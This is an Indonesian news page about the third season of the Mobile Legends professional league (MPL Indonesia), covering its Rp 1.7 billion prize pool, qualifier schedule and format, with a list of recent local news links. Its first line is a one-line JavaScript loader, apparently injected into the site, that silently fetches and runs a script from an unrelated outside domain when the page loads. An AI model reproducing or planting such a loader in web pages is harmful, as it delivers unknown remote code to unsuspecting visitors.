(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Liga Mobile Legend Musim Ketiga Perebutkan Rp 1,7 Miliar


JAKARTA, Turnamen liga profesional Mobile Legends musim ketiga digelar. MET Mobile Legends: Bang Bang Professional League Indonesia (MPL Indonesia) kali ini memperebutkan hadiah senilai total US$ 120 ribu atau sekitar Rp 1,7 miliar.

Lius Andre selaku eSport Manager Moonton Indonesia mengatakan, Mobile Legends adalah gim pionir e-sport di Tanah Air. Pengguna aktifnya setiap bulan mencapai 30 juta. “Kami yakin MPL musim ketiga bisa memberi dampak besar kepada industri,” ujarnya, di Jakarta, Selasa (15/1) dilansir Antaranews.com.

Tahap kualifikasi secara daring berlangsung pada 9 – 13 Januari 2019. Fase selanjutnya adalah final kualifikasi pada 24 – 27 Januari 2019. Sementara itu, musim regulernya dimulai pada 16 Februari – 31 Maret 2019.

“Buka pendaftaran kurang dari seminggu, tim yang mendaftar hampir seribu untuk Indonesia,” ujar Reza Ramadhan sebagai Head of Marketing MET. Indonesia yakni organisasi penyelenggara MPL musim ketiga.

Babak utama MPL musim ketiga diikuti 12 tim, enam di antaranya grup terbaik pada MPL musim kedua. Mereka mendapatkan undangan langsung untuk main di turnamen utama. Sejumlah enam tim lain diperebutkan melalui babak kualifikasi. Beberapa grup tersohor, seperti EVOS, RRQ, dan Louvre dipastikan ikut berkompetisi.

Pada sesi kualifikasi, MPL musim ketiga diawali dengan kualifikasi secara daring melibatkan maksimal 512 tim dari seluruh Indonesia. Mereka bertanding dengan konsep bracket single elimination best of one hingga mencapai babak 32 besar. Format pertandingan lalu berubah menjadi best of three tetap dengan single elimination bracket.

Delapan tim yang lolos dari tahap tersebut akan maju ke babak final kualifikasi. Mereka akan berhadapan dengan grup peringkat ke-7 dan ke-8 MPL musim kedua. Mereka selanjutnya dibagi menjadi dua grup untuk bertanding dalam format round robin best of three.

Tiga tim terbaik melaju ke babak utama musim reguler. MET. Indonesia menyatakan, MPL musim ketiga bakal beda dibandingkan dengan yang sebelumnya. Pada musim ini menggunakan studio profesional dan teknologi yang lebih canggih.

Lius Andre belum bersedia mengungkap waktu dan lokasi grand final. “Kalau kapannya belum bisa disebutkan, tapi kalau di mananya kemungkinan besar di Jakarta,” ujar dia.(din/ant/ktd)

Reporter:din/ant/ktd
Editor:Cell

Desy Arfianty

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

2 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

4 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

14 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

15 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

15 jam ago

This website uses cookies.